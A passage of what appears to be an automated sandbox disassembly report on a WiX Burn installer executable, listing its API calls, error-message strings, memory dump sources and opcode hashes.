                                                            • Instruction Fuzzy Hash: 2011B776E40B3ABAD720AB688C46AFFBB64FB04710F114125BE15F6341EA74DC1486E6
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,008747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0087548E,?), ref: 0087D6DA
                                                            • GetLastError.KERNEL32(?,008747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0087548E,?,?), ref: 0087D6E7
                                                            • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0087D71F
                                                            • GetLastError.KERNEL32(?,008747FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0087548E,?,?), ref: 0087D72B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AddressLibraryLoadProc
                                                            • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                            • API String ID: 1866314245-2276003667
                                                            • Opcode ID: bb8b0a7a762d1c0ae79c71a97eeba6ad3df52c105593e8fc3189b7c2a0820d16
                                                            • Instruction ID: e7b512ffce9736db94c30a7e09e9d7323882365caa092de9a00c4c0e5319fed9
                                                            • Opcode Fuzzy Hash: bb8b0a7a762d1c0ae79c71a97eeba6ad3df52c105593e8fc3189b7c2a0820d16
                                                            • Instruction Fuzzy Hash: 3A11B637A81B32A7C72556985C05F6B6B64FF04761F018635BE28FB385DF64DC0086D1
                                                            APIs
                                                            • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871186
                                                            • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 00871191
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087119F
                                                            • GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711BA
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008711C2
                                                            • GetLastError.KERNEL32(?,?,?,?,?,0087111A,cabinet.dll,00000009,?,?,00000000), ref: 008711D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                            • API String ID: 3104334766-1824683568
                                                            • Opcode ID: 31cc127f2846363216ef500119ff86b8707c3a7bc0ec44c595068bda392091ee
                                                            • Instruction ID: 21d788cb11523f3c46f27bcbac146bab82ad78fcf0ea2f881eb1b260e140b0ff
                                                            • Opcode Fuzzy Hash: 31cc127f2846363216ef500119ff86b8707c3a7bc0ec44c595068bda392091ee
                                                            • Instruction Fuzzy Hash: 0601B53174021ABBDB207BAA9C49DBF7B5CFF40761B008121F969D6200D7B0D902CBB1
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0088F64E
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0088F7C9
                                                            Strings
                                                            • Engine is active, cannot change engine state., xrefs: 0088F668
                                                            • Failed to set download password., xrefs: 0088F777
                                                            • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0088F6B9
                                                            • Failed to set download user., xrefs: 0088F751
                                                            • UX requested unknown container with id: %ls, xrefs: 0088F6F3
                                                            • UX did not provide container or payload id., xrefs: 0088F7B8
                                                            • Failed to set download URL., xrefs: 0088F728
                                                            • UX requested unknown payload with id: %ls, xrefs: 0088F6A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                            • API String ID: 3168844106-2615595102
                                                            • Opcode ID: eb705ae383cfb25af5d02913d9bddee73fb13bab6f6e70baeb10b9e8a65e4159
                                                            • Instruction ID: 4ddf8d09e4e6aaf16946f3025e39f2b3a1f6f7a566801e4ce068e3f5758f5232
                                                            • Opcode Fuzzy Hash: eb705ae383cfb25af5d02913d9bddee73fb13bab6f6e70baeb10b9e8a65e4159
                                                            • Instruction Fuzzy Hash: FB41C732900696ABEB21BB28CC45F6A7378FF14714B158139E914E7252E774ED40C791
                                                            APIs
                                                            • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 008B5A9B
                                                            • GetLastError.KERNEL32 ref: 008B5AA9
                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 008B5AEA
                                                            • GetLastError.KERNEL32 ref: 008B5AF7
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008B5C6A
                                                            • CloseHandle.KERNEL32(?), ref: 008B5C79
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                            • String ID: GET$dlutil.cpp
                                                            • API String ID: 2028584396-3303425918
                                                            • Opcode ID: d8814bf5456822466b38d2251979e41e428210b3e0e59069a21f0a0619f56489
                                                            • Instruction ID: 8c7a416266e39db2a48068f1f746edcd4bb74ffd4f9a83310fe6e8b9504a581f
                                                            • Opcode Fuzzy Hash: d8814bf5456822466b38d2251979e41e428210b3e0e59069a21f0a0619f56489
                                                            • Instruction Fuzzy Hash: 41613A7290061AABDB21DFA4CC45BEEBBB9FF48764F150219FD15F6340E77099409B90
                                                            APIs
                                                              • Part of subcall function 00881020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00880C6F,?,00000000,?,00000000,00000000), ref: 0088104F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00880DF3
                                                            • GetLastError.KERNEL32 ref: 00880E00
                                                            Strings
                                                            • Failed to append cache action., xrefs: 00880D4A
                                                            • Failed to append rollback cache action., xrefs: 00880CCF
                                                            • Failed to create syncpoint event., xrefs: 00880E2E
                                                            • Failed to append package start action., xrefs: 00880C95
                                                            • plan.cpp, xrefs: 00880E24
                                                            • Failed to append payload cache action., xrefs: 00880DAA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareCreateErrorEventLastString
                                                            • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                            • API String ID: 801187047-2489563283
                                                            • Opcode ID: 695506366036c620dac3dffc034ee7c2e41185b7e49d9049d601a6ad2bc32b66
                                                            • Instruction ID: 9bfbfa63811c4dd88b302e397a7133a5aa8395150453d8f21fc11274352821c4
                                                            • Opcode Fuzzy Hash: 695506366036c620dac3dffc034ee7c2e41185b7e49d9049d601a6ad2bc32b66
                                                            • Instruction Fuzzy Hash: 76617B75500609EFDB45EF58C980AAABBFAFF84310F21855AE805DB301EB31EE46DB50
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 008B6F55
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6FA0
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B701C
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7068
                                                            Similarity
                                                            • API ID: String$Free$Compare
                                                            • String ID: `<u$type$url
                                                            • API String ID: 1324494773-1686489133
                                                            • Opcode ID: cc77268a52b2641947461993128f7ac2103c1be68047c84bad4ec5d4f5198eb0
                                                            • Instruction ID: 1ee2597ffcf494348da2686cbf9bf41837be817c8bb42433393aba838001a93a
                                                            • Opcode Fuzzy Hash: cc77268a52b2641947461993128f7ac2103c1be68047c84bad4ec5d4f5198eb0
                                                            • Instruction Fuzzy Hash: F6514B35905219EFCB15DBA4C884EEEBBB8FF04311F1442A9E511EB3A0DB71AE14DB50
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008BB500,00000000,?), ref: 008806D3
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008BB500,00000000,?), ref: 008806E2
                                                              • Part of subcall function 008B0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0088061A,?,00000000,00020006), ref: 008B0C0E
                                                            Strings
                                                            • Failed to update resume mode., xrefs: 008806B7
                                                            • %ls.RebootRequired, xrefs: 008805F0
                                                            • Failed to write volatile reboot required registry key., xrefs: 0088061E
                                                            • Failed to delete registration key: %ls, xrefs: 00880681
                                                            • crypt32.dll, xrefs: 008805AC
                                                            • Failed to open registration key., xrefs: 0088071A
                                                            Similarity
                                                            • API ID: Close$Create
                                                            • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                            • API String ID: 359002179-3398658923
                                                            • Opcode ID: 9b3268f93b222fa94bc420e26786508cac7aae7267ac14510aa43e4feb4acc31
                                                            • Instruction ID: a70187a72e9617b921c1f45ed1d8a42c4b7ea50062a42ab2ba076bb6ad46598d
                                                            • Opcode Fuzzy Hash: 9b3268f93b222fa94bc420e26786508cac7aae7267ac14510aa43e4feb4acc31
                                                            • Instruction Fuzzy Hash: 9F418F32800709FADF22AEA4CC06EAF7BB5FFA0310F144419F515E1261E7719A68DF52
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087F48A
                                                              • Part of subcall function 00874115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?), ref: 00874123
                                                              • Part of subcall function 00874115: GetLastError.KERNEL32(?,0088A0E8,00000000,00000000,?,00000000,008753BD,00000000,?,?,0087D5B5,?,00000000,00000000), ref: 00874131
                                                            • lstrlenA.KERNEL32(008BB500,00000000,00000094,00000000,00000094,?,?,008804BF,swidtag,00000094,?,008BB518,008804BF,00000000,?,00000000), ref: 0087F4DD
                                                              • Part of subcall function 008B4DB3: CreateFileW.KERNEL32(008BB500,40000000,00000001,00000000,00000002,00000080,00000000,008804BF,00000000,?,0087F4F4,?,00000080,008BB500,00000000), ref: 008B4DCB
                                                              • Part of subcall function 008B4DB3: GetLastError.KERNEL32(?,0087F4F4,?,00000080,008BB500,00000000,?,008804BF,?,00000094,?,?,?,?,?,00000000), ref: 008B4DD8
                                                            Strings
                                                            • Failed to write tag xml to file: %ls, xrefs: 0087F51B
                                                            • Failed to allocate regid file path., xrefs: 0087F535
                                                            • swidtag, xrefs: 0087F49D
                                                            • Failed to format tag folder path., xrefs: 0087F543
                                                            • Failed to create regid folder: %ls, xrefs: 0087F525
                                                            • Failed to allocate regid folder path., xrefs: 0087F53C
                                                            Similarity
                                                            • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                            • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                            • API String ID: 904508749-1201533908
                                                            • Opcode ID: d47d38cbbc0b27f1349eb9eab771f94fff68f1f5da148c46458b9f93296d2611
                                                            • Instruction ID: 5da01548fe01820125e3294bba9391e4b140ff8a6932b3c0bc43e9dd59097f9c
                                                            • Opcode Fuzzy Hash: d47d38cbbc0b27f1349eb9eab771f94fff68f1f5da148c46458b9f93296d2611
                                                            • Instruction Fuzzy Hash: 73319A31C40619BBCF21AE99CC41BADBBB4FF04710F108166EA18FA266E770DA509B91
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0087548E,00000000,00000000,?,00000000), ref: 0088548B
                                                            • GetLastError.KERNEL32(?,?,?,00874C61,?,?,00000000,?,?,?,?,?,?,008BB4A0,?,?), ref: 00885496
                                                            Strings
                                                            • Failed to wait for child process exit., xrefs: 008854C4
                                                            • Failed to write restart to message buffer., xrefs: 0088542E
                                                            • pipe.cpp, xrefs: 008854BA
                                                            • Failed to post terminate message to child process., xrefs: 00885476
                                                            • Failed to post terminate message to child process cache thread., xrefs: 0088545A
                                                            • Failed to write exit code to message buffer., xrefs: 00885406
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait
                                                            • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                            • API String ID: 1211598281-2161881128
                                                            • Opcode ID: bc03442f278a7682d81ceba99f8f20e2a2213ef34de1c19498609b98fb789441
                                                            • Instruction ID: 17abdf21fedba74ca6332e1bd13bc9d3ae3b88cf2ff8d4a1f919e9df6b062b32
                                                            • Opcode Fuzzy Hash: bc03442f278a7682d81ceba99f8f20e2a2213ef34de1c19498609b98fb789441
                                                            • Instruction Fuzzy Hash: 99210673940A2ABBDF126A94DC05E9E7778FF00726F204265F910F6290D734ED9097D9
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00889F04,00000003,000007D0,00000003,?,000007D0), ref: 008890B2
                                                            • GetLastError.KERNEL32(?,00889F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 008890BF
                                                            • CloseHandle.KERNEL32(00000000,?,00889F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00889187
                                                            Strings
                                                            • cache.cpp, xrefs: 008890F6
                                                            • Failed to open payload at path: %ls, xrefs: 00889103
                                                            • Failed to verify signature of payload: %ls, xrefs: 0088912F
                                                            • Failed to verify hash of payload: %ls, xrefs: 00889172
                                                            • Failed to verify catalog signature of payload: %ls, xrefs: 0088914E
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLast
                                                            • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                            • API String ID: 2528220319-2757871984
                                                            • Opcode ID: 10931cedabcfcc99bfd2239e79f6655e166d0c22df7344ec39203525b41dc0ab
                                                            • Instruction ID: 9975cb896dbaa09a646220aaf2fc768fadccf92c23bafb1276536d4c7af0c684
                                                            • Opcode Fuzzy Hash: 10931cedabcfcc99bfd2239e79f6655e166d0c22df7344ec39203525b41dc0ab
                                                            • Instruction Fuzzy Hash: 6121B43A944627BACB323A588C4DFBA7A28FF00760F194311FD55F569093399C61EBD1
                                                            APIs
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00876B69
                                                            • GetLastError.KERNEL32 ref: 00876B73
                                                            • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00876BB7
                                                            • GetLastError.KERNEL32 ref: 00876BC1
                                                            Similarity
                                                            • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                            • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 124030351-4026719079
                                                            • Opcode ID: 71499c83448c24411146ff7326fd66f1fef812ba17b74f514c557ab1976a656b
                                                            • Instruction ID: fd11f7edccccb6b24f8da895a4f463e42ca6fb0cd5f6ecac295a8616f9ad8c04
                                                            • Opcode Fuzzy Hash: 71499c83448c24411146ff7326fd66f1fef812ba17b74f514c557ab1976a656b
                                                            • Instruction Fuzzy Hash: 01210773E4163967D720A6588D46FDA77ACFB40B20F118175BD08F7241F634ED404AE6
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879C88
                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0087A895,00000100,000002C0,000002C0,?,000002C0), ref: 00879CA0
                                                            • GetLastError.KERNEL32(?,0087A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00879CAB
                                                            Strings
                                                            • search.cpp, xrefs: 00879CDB
                                                            • Failed to format variable string., xrefs: 00879C93
                                                            • Failed get to file attributes. '%ls', xrefs: 00879CE8
                                                            • Failed to set variable., xrefs: 00879D2B
                                                            • File search: %ls, did not find path: %ls, xrefs: 00879CFD
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                            • API String ID: 1811509786-2053429945
                                                            • Opcode ID: d6edd7eeefedeb4eb649abe5e812c72579f9de99c7bd79f94a5bb67d288ed3bd
                                                            • Instruction ID: 9f51197b89206f55685bc9f1b7365159873574bed693f7a3191ae46a7162c404
                                                            • Opcode Fuzzy Hash: d6edd7eeefedeb4eb649abe5e812c72579f9de99c7bd79f94a5bb67d288ed3bd
                                                            • Instruction Fuzzy Hash: 08214933940124FAEB2216988D46FEEBB68FF11761F208221FD5CF6294D721DD0096D2
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,?), ref: 0088AD57
                                                            • GetLastError.KERNEL32 ref: 0088AD61
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0088ADA0
                                                            • CoUninitialize.OLE32(?,0088C721,?,?), ref: 0088ADDD
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088AD85
                                                            • Failed to initialize COM., xrefs: 0088ADAC
                                                            • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0088AD8F
                                                            • Failed to pump messages in child process., xrefs: 0088ADCB
                                                            Similarity
                                                            • API ID: ErrorInitializeLastUninitializeValue
                                                            • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                            • API String ID: 876858697-113251691
                                                            • Opcode ID: 23b4f59a2dc14f07811b84cdcd142f0bbe37705a31a078e1309d48e89271f47c
                                                            • Instruction ID: 5752810e92b708d0196538b8c325a7dc053734c9c489e5d69f1bda8a66db7638
                                                            • Opcode Fuzzy Hash: 23b4f59a2dc14f07811b84cdcd142f0bbe37705a31a078e1309d48e89271f47c
                                                            • Instruction Fuzzy Hash: 55112333941635BBA6262749CC09D9FBBA8FF04B627014216FC00F7390EBB09C0087D2
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00875D68
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
                                                              • Part of subcall function 008B10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Similarity
                                                            • API ID: QueryValue$Close
                                                            • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 1979452859-3209209246
                                                            • Opcode ID: ea14493ffab5f9ec1444196a95caff820c79fa5dcae87ec334448670d942bde2
                                                            • Instruction ID: 5f511e98a17a1c0ae82bdd553539aa488780def3e3378124574c15b28de75bac
                                                            • Opcode Fuzzy Hash: ea14493ffab5f9ec1444196a95caff820c79fa5dcae87ec334448670d942bde2
                                                            • Instruction Fuzzy Hash: 6401D632A41A29B7CB3256988C0AEEE7B68FB00720F148165F908FA36097B5CE009691
                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0089A33E
                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0089A348
                                                            Strings
                                                            • apply.cpp, xrefs: 0089A36C
                                                            • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 0089A425
                                                            • Failed to clear readonly bit on payload destination path: %ls, xrefs: 0089A377
                                                            • :, xrefs: 0089A3C1
                                                            • download, xrefs: 0089A308
                                                            Similarity
                                                            • API ID: AttributesErrorFileLast
                                                            • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                            • API String ID: 1799206407-1905830404
                                                            • Opcode ID: 31c63f096a53246d1eb065e45506e8fc1dfd19df4d45937c3b2e7eb9ce7bfc79
                                                            • Instruction ID: 3173d1e6d85aaeb01d4b429cbd5ad6f223ead50b63a6222055338d2c7e27f9ce
                                                            • Opcode Fuzzy Hash: 31c63f096a53246d1eb065e45506e8fc1dfd19df4d45937c3b2e7eb9ce7bfc79
                                                            • Instruction Fuzzy Hash: 03519E71A00219ABDF15EFA9C841EAEB7B9FF14710F188159E904EB340E775EA40DBD2
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,00899063,000002C0,00000100), ref: 008B84F5
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00899063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 008B8510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareHeapString$AllocateProcess
                                                            • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                            • API String ID: 2664528157-4206478990
                                                            • Opcode ID: 97bf1cc955e67af5215f58a55fc8b8b33d46e387633f8dafe1471f5b18000cd5
                                                            • Instruction ID: 4be195c4c9962d4ab3ce20b3d05fb0e65b47b5075bc12dbb8c6b79908c42d5a3
                                                            • Opcode Fuzzy Hash: 97bf1cc955e67af5215f58a55fc8b8b33d46e387633f8dafe1471f5b18000cd5
                                                            • Instruction Fuzzy Hash: 2A519E71644605EBDB209F18CC85F9A7BA9FB11720F208218FA69EB3D1DBB0E940CB51
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 008B6513
                                                            • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008B660A
                                                            • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008B6619
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteErrorFileHandleLast
                                                            • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                            • API String ID: 3522763407-1704223933
                                                            • Opcode ID: b4078712b1039f42efb74f5c0fce0367d251c666d3c7bd3a9dc860fa16e4b184
                                                            • Instruction ID: ebc6a4ba461d6b8b4ab013731f231635f72f55d8ee53e1ab5f91d76b5ce00c7e
                                                            • Opcode Fuzzy Hash: b4078712b1039f42efb74f5c0fce0367d251c666d3c7bd3a9dc860fa16e4b184
                                                            • Instruction Fuzzy Hash: 53510972D00119BBDF11DFA48C45AEFBBB9FF08710F144166FA14E6250E7359A219BA1
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879EED
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879F12
                                                            Strings
                                                            • Failed to get component path: %d, xrefs: 00879F76
                                                            • Failed to format product code string., xrefs: 00879F1D
                                                            • Failed to set variable., xrefs: 00879FF6
                                                            • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0087A006
                                                            • Failed to format component id string., xrefs: 00879EF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
